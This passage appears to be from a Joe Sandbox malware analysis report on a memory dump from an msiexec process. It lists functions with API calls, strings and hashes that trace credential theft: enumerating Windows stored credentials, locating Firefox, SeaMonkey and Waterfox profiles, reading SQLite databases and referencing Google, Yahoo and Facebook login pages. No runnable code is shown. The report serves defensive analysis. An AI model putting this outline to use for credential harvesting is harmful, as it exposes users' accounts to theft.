                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                        • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                        • API String ID: 2936932814-4196376884
                                                                                        • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                        • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                        • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                        • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                        Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 886 40bdb0-40bdce call 404363 889 40bf63-40bf6f call 40440c 886->889 890 40bdd4-40bddd 886->890 892 40bdee 890->892 893 40bddf-40bdec CredEnumerateW 890->893 894 40bdf0-40bdf2 892->894 893->894 894->889 896 40bdf8-40be18 call 40b2cc wcslen 894->896 899 40bf5d 896->899 900 40be1e-40be20 896->900 899->889 900->899 901 40be26-40be42 wcsncmp 900->901 902 40be48-40be77 call 40bd5d call 404423 901->902 903 40bf4e-40bf57 901->903 902->903 908 40be7d-40bea3 memset 902->908 903->899 903->900 909 40bea5 908->909 910 40bea7-40beea memcpy 908->910 909->910 911 40bf11-40bf2d wcschr 910->911 912 40beec-40bf06 call 40b2cc _wcsnicmp 910->912 913 40bf38-40bf48 LocalFree 911->913 914 40bf2f-40bf35 911->914 912->911 917 40bf08-40bf0e 912->917 913->903 914->913 917->911
                                                                                        APIs
                                                                                          • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                          • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                          • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                          • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                          • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                        • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                        • wcslen.MSVCRT ref: 0040BE06
                                                                                        • wcsncmp.MSVCRT ref: 0040BE38
                                                                                        • memset.MSVCRT ref: 0040BE91
                                                                                        • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                        • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                        • wcschr.MSVCRT ref: 0040BF24
                                                                                        • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                        • String ID:
                                                                                        • API String ID: 697348961-0
                                                                                        • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                        • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                        • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                        • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                        Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00403CBF
                                                                                        • memset.MSVCRT ref: 00403CD4
                                                                                        • memset.MSVCRT ref: 00403CE9
                                                                                        • memset.MSVCRT ref: 00403CFE
                                                                                        • memset.MSVCRT ref: 00403D13
                                                                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                          • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                        • memset.MSVCRT ref: 00403DDA
                                                                                          • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                          • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                        • String ID: Waterfox$Waterfox\Profiles
                                                                                        • API String ID: 1829478387-11920434
                                                                                        • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                        • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                        • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                        • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                        Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00403E50
                                                                                        • memset.MSVCRT ref: 00403E65
                                                                                        • memset.MSVCRT ref: 00403E7A
                                                                                        • memset.MSVCRT ref: 00403E8F
                                                                                        • memset.MSVCRT ref: 00403EA4
                                                                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                          • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                        • memset.MSVCRT ref: 00403F6B
                                                                                          • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                          • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                        • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                        • API String ID: 1829478387-2068335096
                                                                                        • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                        • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                        • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                        • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                        Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00403FE1
                                                                                        • memset.MSVCRT ref: 00403FF6
                                                                                        • memset.MSVCRT ref: 0040400B
                                                                                        • memset.MSVCRT ref: 00404020
                                                                                        • memset.MSVCRT ref: 00404035
                                                                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                          • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                        • memset.MSVCRT ref: 004040FC
                                                                                          • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                          • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                        • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                        • API String ID: 1829478387-3369679110
                                                                                        • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                        • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                        • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                        • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                        Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy
                                                                                        • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                        • API String ID: 3510742995-2641926074
                                                                                        • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                        • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                        • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                        • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                        Function 0041837F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                        • GetLastError.KERNEL32 ref: 0041847E
                                                                                        • free.MSVCRT ref: 0041848B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateErrorFileLastfree
                                                                                        • String ID: |A
                                                                                        • API String ID: 981974120-1717621600
                                                                                        • Opcode ID: 51ca5a02fc44f8a5d6c80fe755b484a3b8e8795a5c0060307af42e5ba884e769
                                                                                        • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                        • Opcode Fuzzy Hash: 51ca5a02fc44f8a5d6c80fe755b484a3b8e8795a5c0060307af42e5ba884e769
                                                                                        • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                        Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                          • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                          • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                        • memset.MSVCRT ref: 004033B7
                                                                                        • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                        • wcscmp.MSVCRT ref: 004033FC
                                                                                        • _wcsicmp.MSVCRT ref: 00403439
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                        • String ID: $0.@
                                                                                        • API String ID: 2758756878-1896041820
                                                                                        • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                        • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                        • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                        • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                        Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 2941347001-0
                                                                                        • Opcode ID: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
                                                                                        • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                        • Opcode Fuzzy Hash: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
                                                                                        • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                        Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00403C09
                                                                                        • memset.MSVCRT ref: 00403C1E
                                                                                          • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                          • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                        • wcscat.MSVCRT ref: 00403C47
                                                                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                        • wcscat.MSVCRT ref: 00403C70
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memsetwcscat$wcscpywcslen
                                                                                        • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                        • API String ID: 2489821370-1174173950
                                                                                        • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                        • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                        • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                        • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                        Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040A824
                                                                                        • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                        • wcscpy.MSVCRT ref: 0040A854
                                                                                        • wcscat.MSVCRT ref: 0040A86A
                                                                                        • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                        • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 669240632-0
                                                                                        • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                        • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                        • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                        • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                        Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • wcschr.MSVCRT ref: 00414458
                                                                                        • _snwprintf.MSVCRT ref: 0041447D
                                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                        • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                        • String ID: "%s"
                                                                                        • API String ID: 1343145685-3297466227
                                                                                        • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                        • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                        • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                        • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                        Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                        • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProcProcessTimes
                                                                                        • String ID: GetProcessTimes$kernel32.dll
                                                                                        • API String ID: 1714573020-3385500049
                                                                                        • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                        • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                        • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                        • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                        Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 004087D6
                                                                                          • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                          • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                        • memset.MSVCRT ref: 00408828
                                                                                        • memset.MSVCRT ref: 00408840
                                                                                        • memset.MSVCRT ref: 00408858
                                                                                        • memset.MSVCRT ref: 00408870
                                                                                        • memset.MSVCRT ref: 00408888
                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 2911713577-0
                                                                                        • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                        • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                        • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                        • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                        Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                        • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                        • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcmp
                                                                                        • String ID: @ $SQLite format 3
                                                                                        • API String ID: 1475443563-3708268960
                                                                                        • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                        • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                        • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                        • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                        Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsicmpqsort
                                                                                        • String ID: /nosort$/sort
                                                                                        • API String ID: 1579243037-1578091866
                                                                                        • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                        • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                        • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                        • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                        Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040E60F
                                                                                        • memset.MSVCRT ref: 0040E629
